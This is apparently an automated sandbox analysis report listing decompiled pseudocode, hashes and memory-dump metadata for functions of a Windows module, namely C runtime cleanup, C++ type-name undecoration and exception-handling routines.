Part of subcall function 6E1C0755: _free.LIBCMT ref: 6E1C0784
Part of subcall function 6E1C0755: _free.LIBCMT ref: 6E1C0796
Part of subcall function 6E1C0755: _free.LIBCMT ref: 6E1C07A8
Part of subcall function 6E1C0755: _free.LIBCMT ref: 6E1C07BA
Part of subcall function 6E1C0755: _free.LIBCMT ref: 6E1C07CC
Part of subcall function 6E1C0755: _free.LIBCMT ref: 6E1C07DE
Part of subcall function 6E1C0755: _free.LIBCMT ref: 6E1C07F0
Part of subcall function 6E1C0755: _free.LIBCMT ref: 6E1C0802
Part of subcall function 6E1C0755: _free.LIBCMT ref: 6E1C0814
Part of subcall function 6E1C0755: _free.LIBCMT ref: 6E1C0826
Part of subcall function 6E1C0755: _free.LIBCMT ref: 6E1C0838
Part of subcall function 6E1C0755: _free.LIBCMT ref: 6E1C084A

_free.LIBCMT ref: 6E1BC808

Part of subcall function 6E1B110D: HeapFree.KERNEL32(00000000,00000000,?,6E1C0F1D,?,00000000,?,A1724430,?,6E1C1221,?,00000007,?,?,6E1BC966,?), ref: 6E1B1123
Part of subcall function 6E1B110D: GetLastError.KERNEL32(?,?,6E1C0F1D,?,00000000,?,A1724430,?,6E1C1221,?,00000007,?,?,6E1BC966,?,?), ref: 6E1B1135

_free.LIBCMT ref: 6E1BC82A
_free.LIBCMT ref: 6E1BC83F
_free.LIBCMT ref: 6E1BC84A
_free.LIBCMT ref: 6E1BC86C
_free.LIBCMT ref: 6E1BC87F
_free.LIBCMT ref: 6E1BC88D
_free.LIBCMT ref: 6E1BC898
_free.LIBCMT ref: 6E1BC8D0
_free.LIBCMT ref: 6E1BC8D7
_free.LIBCMT ref: 6E1BC8F4
_free.LIBCMT ref: 6E1BC90C

Strings

P'!n, xrefs: 6E1BC7E5

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: P'!n
API String ID: 161543041-4057913703
Opcode ID: 10a26f557a1f24e1fdefa93e6dac1d151266f514a0a55ac387b9e90f03bb95f9
Instruction ID: c829aa59ce33f871bb8c1439adfcdc3f6d48852d31289ac1a02649ab0bcc3e60
Opcode Fuzzy Hash: 10a26f557a1f24e1fdefa93e6dac1d151266f514a0a55ac387b9e90f03bb95f9
Instruction Fuzzy Hash: FD316C71B043029FEB51DAB9D848B8AB3E9FF14355F224829E469DB150DF74E8C4EB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E19EF3E, Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 338
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E19EF3E(signed int* _a4, signed int* _a8) {
				signed char _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char* _v24;
				signed int _v28;
				char* _v32;
				void* __ebx;
				intOrPtr* _t134;
				signed int* _t136;
				signed char _t141;
				signed int _t143;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t155;
				signed int* _t159;
				signed int* _t160;
				signed int _t161;
				signed char _t180;
				signed int _t181;
				signed int* _t187;
				signed int _t188;
				signed int _t189;
				void* _t197;
				signed int _t203;
				void* _t204;
				void* _t205;
				void* _t206;
				void* _t207;
				void* _t208;
				signed char _t210;
				signed char _t211;
				signed int _t221;
				intOrPtr _t226;
				intOrPtr* _t228;
				signed int _t229;
				void* _t232;
				signed int _t234;
				void* _t244;

				_t134 =  *0x6e21304c; // 0x0
				_t211 =  *_t134;
				if(_t211 == 0) {
					E6E19D85E(_t211, _a4, 1, _a8);
					L93:
					_t136 = _a4;
					L94:
					return _t136;
				}
				_v16 = _v16 & 0x00000000;
				_t3 = _t134 + 1; // 0x1
				_t228 = _t3;
				_v12 = _v12 & 0x00000000;
				_t203 = _t211 & 0x000000ff;
				 *0x6e21304c = _t228;
				_t232 = 2;
				_t244 = _t203 - 0x4e;
				if(_t244 > 0) {
					__eflags = _t203 - 0x4f;
					if(__eflags == 0) {
						_v32 = "long ";
						_v28 = 5;
						E6E19D731( &_v16,  &_v32);
						L79:
						_v32 = "double";
						_t213 =  &_v16;
						_v28 = 6;
						E6E19D944( &_v16,  &_v32);
						L80:
						_t141 = 0;
						_t204 = _t203 - 0x43;
						if(_t204 == 0) {
							_v32 = "signed ";
							_v28 = 7;
							L88:
							_t116 =  &_v32; // 0x6e20545c
							_t143 = E6E19D46F( &_v24, _t116);
							_t119 =  &_v32; // 0x6e20545c
							_t213 = _t143;
							E6E19D8A2(_t143, _t119,  &_v16);
							_t120 =  &_v32; // 0x6e20545c
							_v16 =  *_t120;
							_v12 = _v28;
							L89:
							_t147 = _a8;
							if( *_a8 != 0) {
								_t125 =  &_v32; // 0x6e20545c
								E6E19D99C( &_v16, E6E19D833(_t213, _t125, 0x20, _t147));
							}
							_t136 = _a4;
							 *_t136 = _v16;
							_t136[1] = _v12;
							goto L94;
						}
						_t205 = _t204 - _t232;
						if(_t205 == 0) {
							L33:
							_v32 = "unsigned ";
							_v28 = 9;
							goto L88;
						}
						_t206 = _t205 - _t232;
						if(_t206 == 0) {
							goto L33;
						}
						_t207 = _t206 - _t232;
						if(_t207 == 0) {
							goto L33;
						}
						_t208 = _t207 - _t232;
						if(_t208 == 0) {
							goto L33;
						}
						if(_t208 != 0x14) {
							goto L89;
						}
						L28:
						_t152 = (_t141 & 0x000000ff) - 0x45;
						if(_t152 == 0) {
							goto L33;
						}
						_t153 = _t152 - _t232;
						if(_t153 == 0) {
							goto L33;
						}
						_t154 = _t153 - _t232;
						if(_t154 == 0) {
							goto L33;
						}
						_t155 = _t154 - _t232;
						if(_t155 == 0 || _t155 == _t232) {
							goto L33;
						} else {
							goto L89;
						}
					}
					if(__eflags <= 0) {
						L76:
						 *0x6e21304c = _t228 - 1;
						_t159 = E6E1A0183( &_v32);
						_t213 =  *_t159;
						_t229 = _t159[1];
						_v16 = _t213;
						_v12 = _t229;
						__eflags = _t213;
						if(_t213 != 0) {
							goto L80;
						}
						L59:
						_t136 = _a4;
						 *_t136 = _t213;
						_t136[1] = _t229;
						goto L94;
					}
					__eflags = _t203 - 0x53;
					if(_t203 <= 0x53) {
						_t210 = _t203 & 0x00000003;
						__eflags = _t210;
						L65:
						_t160 = _a8;
						_v16 = _v16 & 0x00000000;
						_v12 = _v12 & 0x00000000;
						_t221 =  *_t160;
						_t161 = _t160[1];
						_v32 = _t221;
						_v28 = _t161;
						__eflags = _t210 - 0xfffffffe;
						if(_t210 != 0xfffffffe) {
							__eflags = _t221;
							if(_t221 == 0) {
								_t234 = _t210 & 0x00000002;
								__eflags = _t210 & 0x00000001;
								if((_t210 & 0x00000001) == 0) {
									__eflags = _t234;
									if(_t234 != 0) {
										_v24 = "volatile";
										_v20 = 8;
										E6E19D731( &_v16,  &_v24);
									}
								} else {
									_v24 = "const";
									_v20 = 5;
									E6E19D731( &_v16,  &_v24);
									__eflags = _t234;
									if(_t234 != 0) {
										_v24 = " volatile";
										_v20 = 9;
										E6E19D944( &_v16,  &_v24);
									}
								}
							}
							E6E1A178E(_t210, _a4,  &_v16,  &_v32, 1);
							goto L93;
						}
						_v28 = _t161 | 0x00000800;
						E6E1A178E(_t210,  &_v24,  &_v16,  &_v32, 0);
						_t229 = _v20;
						__eflags = 0x00000800 & _t229;
						if((0x00000800 & _t229) == 0) {
							_v32 = 0x6e204cdc;
							_v28 = 2;
							E6E19D944( &_v24,  &_v32);
							_t229 = _v20;
						}
						_t213 = _v24;
						goto L59;
					}
					__eflags = _t203 - 0x58;
					if(_t203 == 0x58) {
						_v32 = "void";
						_v28 = 4;
						L12:
						_t213 =  &_v16;
						E6E19D731( &_v16,  &_v32);
						goto L89;
					}
					__eflags = _t203 - 0x5f;
					if(_t203 != 0x5f) {
						goto L76;
					}
					_t180 =  *_t228;
					_t23 = _t228 + 1; // 0x2
					_t226 = _t23;
					_v5 = _t180;
					_t181 = _t180 & 0x000000ff;
					 *0x6e21304c = _t226;
					__eflags = _t181 - 0x4e;
					if(__eflags > 0) {
						__eflags = _t181 - 0x53;
						if(__eflags > 0) {
							__eflags = _t181 - 0x55;
							if(_t181 == 0x55) {
								_v32 = "char32_t";
								L42:
								_v28 = 8;
								L26:
								_t213 =  &_v16;
								E6E19D731( &_v16,  &_v32);
								L27:
								_t141 = _v5;
								goto L28;
							}
							__eflags = _t181 - 0x57;
							if(_t181 == 0x57) {
								_v32 = "wchar_t";
								L37:
								_v28 = 7;
								goto L26;
							}
							__eflags = _t181 + 0xffffffa8 - 1;
							if(_t181 + 0xffffffa8 > 1) {
								L60:
								_v32 = "UNKNOWN";
								goto L37;
							}
							_t51 = _t226 - 1; // 0x1
							 *0x6e21304c = _t51;
							_t187 = E6E1A0183( &_v32);
							_t213 =  *_t187;
							_t229 = _t187[1];
							_v16 = _t213;
							_v12 = _t229;
							__eflags = _t213;
							if(_t213 != 0) {
								goto L27;
							}
							goto L59;
						}
						if(__eflags == 0) {
							_v32 = "char16_t";
							goto L42;
						}
						_t188 = _t181 - 0x4f;
						__eflags = _t188;
						if(_t188 == 0) {
							_t210 = 0xfffffffe;
							goto L65;
						}
						_t189 = _t188 - _t232;
						__eflags = _t189;
						if(_t189 == 0) {
							_v32 = "char8_t";
							goto L37;
						}
						__eflags = _t189 != 1;
						if(_t189 != 1) {
							goto L60;
						}
						_v32 = "<unknown>";
						_v28 = 9;
						goto L26;
					}
					if(__eflags == 0) {
						_v32 = "bool";
						_v28 = 4;
						goto L26;
					}
					__eflags = _t181 - 0x47;
					if(_t181 > 0x47) {
						__eflags = _t181 - 0x49;
						if(_t181 <= 0x49) {
							_v32 = "__int32";
							goto L37;
						}
						__eflags = _t181 - 0x4b;
						if(_t181 <= 0x4b) {
							_v32 = "__int64";
							goto L37;
						}
						__eflags = _t181 - 0x4d;
						if(_t181 > 0x4d) {
							goto L60;
						}
						_v32 = "__int128";
						goto L42;
					}
					__eflags = _t181 - 0x46;
					if(_t181 >= 0x46) {
						_v32 = "__int16";
						goto L37;
					}
					__eflags = _t181;
					if(_t181 == 0) {
						_t213 =  &_v16;
						 *0x6e21304c = _t228;
						E6E19D795( &_v16, 1);
						goto L27;
					}
					__eflags = _t181 - 0x24;
					if(_t181 == 0x24) {
						_v32 = "__w64 ";
						_v28 = 6;
						E6E19D811(_t226, _a4,  &_v32, E6E19EF3E( &_v24, _a8));
						goto L93;
					}
					__eflags = _t181 + 0xffffffbc - 1;
					if(_t181 + 0xffffffbc > 1) {
						goto L60;
					} else {
						_v32 = "__int8";
						_v28 = 6;
						goto L26;
					}
				}
				if(_t244 == 0) {
					goto L79;
				}
				_t6 = _t203 - 0x43; // -67
				_t197 = _t6;
				if(_t197 > 0xa) {
					goto L76;
				}
				_t7 = _t197 + 0x6e19f426; // 0x8bffffe5
				switch( *((intOrPtr*)(( *_t7 & 0x000000ff) * 4 +  &M6E19F40E))) {
					case 0:
						_v32 = "char";
						goto L6;
					case 1:
						_v32 = "short";
						_v28 = 5;
						goto L7;
					case 2:
						_v32 = "int";
						_v28 = 3;
						goto L7;
					case 3:
						_v32 = "long";
						L6:
						_v28 = 4;
						L7:
						_t213 =  &_v16;
						E6E19D731( &_v16,  &_v32);
						goto L80;
					case 4:
						_v32 = "float";
						_v28 = 5;
						goto L12;
					case 5:
						goto L76;
				}
			}

0x6e19ef41
0x6e19ef49
0x6e19ef4f
0x6e19f3fe
0x6e19f406
0x6e19f406
0x6e19f409
0x6e19f40c
0x6e19f40c
0x6e19ef55
0x6e19ef59
0x6e19ef59
0x6e19ef5c
0x6e19ef60
0x6e19ef63
0x6e19ef6b
0x6e19ef6c
0x6e19ef6f
0x6e19effc
0x6e19efff
0x6e19f32f
0x6e19f33a
0x6e19f341
0x6e19f346
0x6e19f349
0x6e19f351
0x6e19f354
0x6e19f35b
0x6e19f360
0x6e19f360
0x6e19f362
0x6e19f365
0x6e19f391
0x6e19f398
0x6e19f39f
0x6e19f39f
0x6e19f3a6
0x6e19f3af
0x6e19f3b3
0x6e19f3b5
0x6e19f3ba
0x6e19f3bd
0x6e19f3c3
0x6e19f3c6
0x6e19f3c6
0x6e19f3cc
0x6e19f3cf
0x6e19f3e1
0x6e19f3e1
0x6e19f3e6
0x6e19f3ec
0x6e19f3f1
0x00000000
0x6e19f3f1
0x6e19f367
0x6e19f369
0x6e19f0aa
0x6e19f0aa
0x6e19f0b1
0x00000000
0x6e19f0b1
0x6e19f36f
0x6e19f371
0x00000000
0x00000000
0x6e19f377
0x6e19f379
0x00000000
0x00000000
0x6e19f37f
0x6e19f381
0x00000000
0x00000000
0x6e19f38a
0x00000000
0x00000000
0x6e19f08e
0x6e19f091
0x6e19f094
0x00000000
0x00000000
0x6e19f096
0x6e19f098
0x00000000
0x00000000
0x6e19f09a
0x6e19f09c
0x00000000
0x00000000
0x6e19f09e
0x6e19f0a0
0x00000000
0x00000000
0x00000000
0x00000000
0x6e19f0a0
0x6e19f005
0x6e19f306
0x6e19f309
0x6e19f312
0x6e19f318
0x6e19f31a
0x6e19f31d
0x6e19f320
0x6e19f323
0x6e19f325
0x00000000
0x00000000
0x6e19f1d8
0x6e19f1d8
0x6e19f1db
0x6e19f1dd
0x00000000
0x6e19f1dd
0x6e19f00b
0x6e19f00e
0x6e19f21c
0x6e19f21c
0x6e19f21f
0x6e19f21f
0x6e19f222
0x6e19f226
0x6e19f22a
0x6e19f22c
0x6e19f22f
0x6e19f232
0x6e19f235
0x6e19f238
0x6e19f286
0x6e19f288
0x6e19f28c
0x6e19f28f
0x6e19f292
0x6e19f2ce
0x6e19f2d0
0x6e19f2d5
0x6e19f2e0
0x6e19f2e7
0x6e19f2e7
0x6e19f294
0x6e19f297
0x6e19f2a2
0x6e19f2a9
0x6e19f2ae
0x6e19f2b0
0x6e19f2b5
0x6e19f2c0
0x6e19f2c7
0x6e19f2c7
0x6e19f2b0
0x6e19f292
0x6e19f2f9
0x00000000
0x6e19f2fe
0x6e19f241
0x6e19f252
0x6e19f257
0x6e19f25d
0x6e19f25f
0x6e19f264
0x6e19f26f
0x6e19f276
0x6e19f27b
0x6e19f27b
0x6e19f27e
0x00000000
0x6e19f27e
0x6e19f014
0x6e19f017
0x6e19f209
0x6e19f210
0x6e19efeb
0x6e19efef
0x6e19eff2
0x00000000
0x6e19eff2
0x6e19f01d
0x6e19f020
0x00000000
0x00000000
0x6e19f026
0x6e19f028
0x6e19f028
0x6e19f02b
0x6e19f02e
0x6e19f031
0x6e19f037
0x6e19f03a
0x6e19f15c
0x6e19f15f
0x6e19f1a1
0x6e19f1a4
0x6e19f1fd
0x6e19f12b
0x6e19f12b
0x6e19f07f
0x6e19f083
0x6e19f086
0x6e19f08b
0x6e19f08b
0x00000000
0x6e19f08b
0x6e19f1a6
0x6e19f1a9
0x6e19f1f1
0x6e19f105
0x6e19f105
0x00000000
0x6e19f105
0x6e19f1ae
0x6e19f1b1
0x6e19f1e5
0x6e19f1e5
0x00000000
0x6e19f1e5
0x6e19f1b3
0x6e19f1b6
0x6e19f1bf
0x6e19f1c5
0x6e19f1c7
0x6e19f1ca
0x6e19f1cd
0x6e19f1d0
0x6e19f1d2
0x00000000
0x00000000
0x00000000
0x6e19f1d2
0x6e19f161
0x6e19f198
0x00000000
0x6e19f198
0x6e19f163
0x6e19f163
0x6e19f166
0x6e19f192
0x00000000
0x6e19f192
0x6e19f168
0x6e19f168
0x6e19f16a
0x6e19f184
0x00000000
0x6e19f184
0x6e19f16c
0x6e19f16f
0x00000000
0x00000000
0x6e19f171
0x6e19f178
0x00000000
0x6e19f178
0x6e19f040
0x6e19f149
0x6e19f150
0x00000000
0x6e19f150
0x6e19f046
0x6e19f049
0x6e19f111
0x6e19f114
0x6e19f140
0x00000000
0x6e19f140
0x6e19f116
0x6e19f119
0x6e19f137
0x00000000
0x6e19f137
0x6e19f11b
0x6e19f11e
0x00000000
0x00000000
0x6e19f124
0x00000000
0x6e19f124
0x6e19f04f
0x6e19f052
0x6e19f0fe
0x00000000
0x6e19f0fe
0x6e19f058
0x6e19f05a
0x6e19f0ee
0x6e19f0f1
0x6e19f0f7
0x00000000
0x6e19f0f7
0x6e19f060
0x6e19f063
0x6e19f0c3
0x6e19f0cb
0x6e19f0df
0x00000000
0x6e19f0e4
0x6e19f068
0x6e19f06b
0x00000000
0x6e19f071
0x6e19f071
0x6e19f078
0x00000000
0x6e19f078
0x6e19f06b
0x6e19ef75
0x00000000
0x00000000
0x6e19ef7b
0x6e19ef7b
0x6e19ef81
0x00000000
0x00000000
0x6e19ef87
0x6e19ef8e
0x00000000
0x6e19ef95
0x00000000
0x00000000
0x6e19efb4
0x6e19efbb
0x00000000
0x00000000
0x6e19efc4
0x6e19efcb
0x00000000
0x00000000
0x6e19efd4
0x6e19ef9c
0x6e19ef9c
0x6e19efa3
0x6e19efa7
0x6e19efaa
0x00000000
0x00000000
0x6e19efdd
0x6e19efe4
0x00000000
0x00000000
0x00000000
0x00000000

APIs

shared_ptr.LIBCMT ref: 6E19EFAA
shared_ptr.LIBCMT ref: 6E19EFF2
shared_ptr.LIBCMT ref: 6E19F086
operator+.LIBVCRUNTIME ref: 6E19F0DF
DName::operator=.LIBVCRUNTIME ref: 6E19F0F7
shared_ptr.LIBCMT ref: 6E19F341
DName::operator+.LIBCMT ref: 6E19F3B5
operator+.LIBVCRUNTIME ref: 6E19F3FE

Strings

\T n, xrefs: 6E19F39F, 6E19F3A2
|T n, xrefs: 6E19F2D5

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: shared_ptr$operator+$Name::operator+Name::operator=
String ID: \T n$|T n
API String ID: 1464150960-729768605
Opcode ID: 71200e4fcba6edaa2508c8eda1a56a5ed101e63b74ddb0adc501a1aa3291af04
Instruction ID: c6cd2dc91d0e6f462ddc9a3e413a6c98dbd271e12eba2622ccda86b47215ed8f
Opcode Fuzzy Hash: 71200e4fcba6edaa2508c8eda1a56a5ed101e63b74ddb0adc501a1aa3291af04
Instruction Fuzzy Hash: BDD139B1C4420AAFCB10CFD5C4957FEBBB9AB19314F20815AE521AB284D7389785FF91

Uniqueness

Uniqueness Score: -1.00%

Function 6E19C29B, Relevance: 19.6, APIs: 7, Strings: 4, Instructions: 308
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E6E19C29B(signed int __ecx, signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, char _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				char _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr* _v48;
				signed int _v52;
				signed int* _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				void* _v72;
				char _v88;
				intOrPtr _v92;
				signed int _v96;
				intOrPtr _v104;
				void _v108;
				intOrPtr* _v116;
				signed char* _v188;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t203;
				void* _t204;
				signed int _t205;
				char _t206;
				signed int _t208;
				signed int _t210;
				signed char* _t211;
				signed int _t212;
				signed int _t213;
				signed int _t217;
				void* _t220;
				signed char* _t223;
				void* _t225;
				void* _t226;
				signed char _t230;
				signed int _t231;
				void* _t233;
				signed int _t234;
				void* _t237;
				void* _t240;
				signed char _t247;
				intOrPtr* _t252;
				void* _t255;
				signed int* _t257;
				signed int _t258;
				intOrPtr _t259;
				signed int _t260;
				void* _t265;
				void* _t270;
				void* _t271;
				signed char* _t274;
				intOrPtr* _t275;
				signed char _t276;
				signed int _t277;
				signed int _t278;
				intOrPtr* _t280;
				signed int _t281;
				signed int _t282;
				signed int _t287;
				signed int _t294;
				signed int _t295;
				intOrPtr _t298;
				signed int _t300;
				signed int _t303;
				signed char* _t304;
				signed int _t305;
				signed int _t306;
				signed int* _t308;
				signed char* _t311;
				signed int _t321;
				signed int _t322;
				signed int _t324;
				signed int _t333;
				void* _t335;
				void* _t337;
				void* _t338;
				void* _t339;
				void* _t340;

				_t303 = __edx;
				_t279 = __ecx;
				_push(_t322);
				_t308 = _a20;
				_v32 = 0;
				_v5 = 0;
				_t203 = E6E1A3BA4(_a8, _a16, _t308);
				_t338 = _t337 + 0xc;
				_v16 = _t203;
				if(_t203 < 0xffffffff || _t203 >= _t308[1]) {
					L69:
					_t204 = E6E1AF464(_t274, _t279, _t303, _t308, _t322);
					asm("int3");
					_t335 = _t338;
					_t339 = _t338 - 0x38;
					_push(_t274);
					_t275 = _v116;
					__eflags =  *_t275 - 0x80000003;
					if( *_t275 == 0x80000003) {
						return _t204;
					} else {
						_push(_t322);
						_t205 = E6E19BF1F(_t275, _t279, _t303, _t308, _t322, _t308);
						__eflags =  *(_t205 + 8);
						if( *(_t205 + 8) != 0) {
							__imp__EncodePointer();
							_t322 = _t205;
							_t225 = E6E19BF1F(_t275, _t279, _t303, 0, _t322, 0);
							__eflags =  *((intOrPtr*)(_t225 + 8)) - _t322;
							if( *((intOrPtr*)(_t225 + 8)) != _t322) {
								__eflags =  *_t275 - 0xe0434f4d;
								if( *_t275 != 0xe0434f4d) {
									__eflags =  *_t275 - 0xe0434352;
									if( *_t275 != 0xe0434352) {
										_t217 = E6E19B2CA(_t275, _a4, _a8, _a12, _a16, _a24, _a28);
										_t339 = _t339 + 0x1c;
										__eflags = _t217;
										if(_t217 != 0) {
											L86:
											return _t217;
										}
									}
								}
							}
						}
						_t206 = _a16;
						_v28 = _t206;
						_v24 = 0;
						__eflags =  *(_t206 + 0xc);
						if( *(_t206 + 0xc) > 0) {
							_push(_a24);
							E6E19B1FC(_t275, _t279, 0, _t322,  &_v44,  &_v28, _a20, _a12, _t206);
							_t305 = _v40;
							_t340 = _t339 + 0x18;
							_t217 = _v44;
							_v20 = _t217;
							_v12 = _t305;
							__eflags = _t305 - _v32;
							if(_t305 >= _v32) {
								goto L86;
							}
							_t281 = _t305 * 0x14;
							__eflags = _t281;
							_v16 = _t281;
							do {
								_t282 = 5;
								_t220 = memcpy( &_v64,  *((intOrPtr*)( *_t217 + 0x10)) + _t281, _t282 << 2);
								_t340 = _t340 + 0xc;
								__eflags = _v64 - _t220;
								if(_v64 > _t220) {
									goto L85;
								}
								__eflags = _t220 - _v60;
								if(_t220 > _v60) {
									goto L85;
								}
								_t223 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t287 = _t223[4];
								__eflags = _t287;
								if(_t287 == 0) {
									L83:
									__eflags =  *_t223 & 0x00000040;
									if(( *_t223 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E6E19C21B(_t305, _t275, _a4, _a8, _a12, _a16, _t223, 0,  &_v64, _a24, _a28);
										_t305 = _v12;
										_t340 = _t340 + 0x30;
									}
									goto L85;
								}
								__eflags =  *((char*)(_t287 + 8));
								if( *((char*)(_t287 + 8)) != 0) {
									goto L85;
								}
								goto L83;
								L85:
								_t305 = _t305 + 1;
								_t217 = _v20;
								_t281 = _v16 + 0x14;
								_v12 = _t305;
								_v16 = _t281;
								__eflags = _t305 - _v32;
							} while (_t305 < _v32);
							goto L86;
						}
						E6E1AF464(_t275, _t279, _t303, 0, _t322);
						asm("int3");
						_push(_t335);
						_t304 = _v188;
						_push(_t275);
						_push(_t322);
						_push(0);
						_t208 = _t304[4];
						__eflags = _t208;
						if(_t208 == 0) {
							L111:
							_t210 = 1;
							__eflags = 1;
						} else {
							_t280 = _t208 + 8;
							__eflags =  *_t280;
							if( *_t280 == 0) {
								goto L111;
							} else {
								__eflags =  *_t304 & 0x00000080;
								_t311 = _v0;
								if(( *_t304 & 0x00000080) == 0) {
									L93:
									_t276 = _t311[4];
									_t324 = 0;
									__eflags = _t208 - _t276;
									if(_t208 == _t276) {
										L103:
										__eflags =  *_t311 & 0x00000002;
										if(( *_t311 & 0x00000002) == 0) {
											L105:
											_t211 = _a4;
											__eflags =  *_t211 & 0x00000001;
											if(( *_t211 & 0x00000001) == 0) {
												L107:
												__eflags =  *_t211 & 0x00000002;
												if(( *_t211 & 0x00000002) == 0) {
													L109:
													_t324 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t304 & 0x00000002;
													if(( *_t304 & 0x00000002) != 0) {
														goto L109;
													}
												}
											} else {
												__eflags =  *_t304 & 0x00000001;
												if(( *_t304 & 0x00000001) != 0) {
													goto L107;
												}
											}
										} else {
											__eflags =  *_t304 & 0x00000008;
											if(( *_t304 & 0x00000008) != 0) {
												goto L105;
											}
										}
										_t210 = _t324;
									} else {
										_t187 = _t276 + 8; // 0x6e
										_t212 = _t187;
										while(1) {
											_t277 =  *_t280;
											__eflags = _t277 -  *_t212;
											if(_t277 !=  *_t212) {
												break;
											}
											__eflags = _t277;
											if(_t277 == 0) {
												L99:
												_t213 = _t324;
											} else {
												_t278 =  *((intOrPtr*)(_t280 + 1));
												__eflags = _t278 -  *((intOrPtr*)(_t212 + 1));
												if(_t278 !=  *((intOrPtr*)(_t212 + 1))) {
													break;
												} else {
													_t280 = _t280 + 2;
													_t212 = _t212 + 2;
													__eflags = _t278;
													if(_t278 != 0) {
														continue;
													} else {
														goto L99;
													}
												}
											}
											L101:
											__eflags = _t213;
											if(_t213 == 0) {
												goto L103;
											} else {
												_t210 = 0;
											}
											goto L112;
										}
										asm("sbb eax, eax");
										_t213 = _t212 | 0x00000001;
										__eflags = _t213;
										goto L101;
									}
								} else {
									__eflags =  *_t311 & 0x00000010;
									if(( *_t311 & 0x00000010) != 0) {
										goto L111;
									} else {
										goto L93;
									}
								}
							}
						}
						L112:
						return _t210;
					}
				} else {
					_t274 = _a4;
					if( *_t274 != 0xe06d7363 || _t274[0x10] != 3 || _t274[0x14] != 0x19930520 && _t274[0x14] != 0x19930521 && _t274[0x14] != 0x19930522) {
						_t322 = 0;
						__eflags = 0;
						goto L24;
					} else {
						_t322 = 0;
						if(_t274[0x1c] != 0) {
							L24:
							_t279 = _a12;
							_v12 = _t279;
							goto L26;
						} else {
							_t226 = E6E19BF1F(_t274, _t279, _t303, _t308, 0);
							if( *((intOrPtr*)(_t226 + 0x10)) == 0) {
								L63:
								return _t226;
							} else {
								_t274 =  *(E6E19BF1F(_t274, _t279, _t303, _t308, 0) + 0x10);
								_t265 = E6E19BF1F(_t274, _t279, _t303, _t308, 0);
								_v32 = 1;
								_v12 =  *((intOrPtr*)(_t265 + 0x14));
								if(_t274 == 0 ||  *_t274 == 0xe06d7363 && _t274[0x10] == 3 && (_t274[0x14] == 0x19930520 || _t274[0x14] == 0x19930521 || _t274[0x14] == 0x19930522) && _t274[0x1c] == _t322) {
									goto L69;
								} else {
									if( *((intOrPtr*)(E6E19BF1F(_t274, _t279, _t303, _t308, _t322) + 0x1c)) == _t322) {
										L25:
										_t279 = _v12;
										_t203 = _v16;
										L26:
										_v56 = _t308;
										_v52 = _t322;
										__eflags =  *_t274 - 0xe06d7363;
										if( *_t274 != 0xe06d7363) {
											L59:
											__eflags = _t308[3] - _t322;
											if(_t308[3] <= _t322) {
												goto L62;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L69;
												} else {
													_push(_a32);
													_push(_a28);
													_push(_t203);
													_push(_t308);
													_push(_a16);
													_push(_t279);
													_push(_a8);
													_push(_t274);
													L70();
													_t338 = _t338 + 0x20;
													goto L62;
												}
											}
										} else {
											__eflags = _t274[0x10] - 3;
											if(_t274[0x10] != 3) {
												goto L59;
											} else {
												__eflags = _t274[0x14] - 0x19930520;
												if(_t274[0x14] == 0x19930520) {
													L31:
													__eflags = _t308[3] - _t322;
													if(_t308[3] > _t322) {
														_push(_a28);
														E6E19B1FC(_t274, _t279, _t308, _t322,  &_v72,  &_v56, _t203, _a16, _t308);
														_t303 = _v68;
														_t338 = _t338 + 0x18;
														_t252 = _v72;
														_v48 = _t252;
														_v20 = _t303;
														__eflags = _t303 - _v60;
														if(_t303 < _v60) {
															_t294 = _t303 * 0x14;
															__eflags = _t294;
															_v36 = _t294;
															do {
																_t295 = 5;
																_t255 = memcpy( &_v108,  *((intOrPtr*)( *_t252 + 0x10)) + _t294, _t295 << 2);
																_t338 = _t338 + 0xc;
																__eflags = _v108 - _t255;
																if(_v108 <= _t255) {
																	__eflags = _t255 - _v104;
																	if(_t255 <= _v104) {
																		_t298 = 0;
																		_v24 = 0;
																		__eflags = _v96;
																		if(_v96 != 0) {
																			_t257 =  *(_t274[0x1c] + 0xc);
																			_t306 =  *_t257;
																			_t258 =  &(_t257[1]);
																			__eflags = _t258;
																			_v40 = _t258;
																			_t259 = _v92;
																			_v44 = _t306;
																			_v28 = _t259;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t321 = _v40;
																				_t333 = _t306;
																				__eflags = _t333;
																				if(_t333 <= 0) {
																					goto L42;
																				} else {
																					while(1) {
																						_push(_t274[0x1c]);
																						_t260 =  &_v88;
																						_push( *_t321);
																						_push(_t260);
																						L89();
																						_t338 = _t338 + 0xc;
																						__eflags = _t260;
																						if(_t260 != 0) {
																							break;
																						}
																						_t333 = _t333 - 1;
																						_t321 = _t321 + 4;
																						__eflags = _t333;
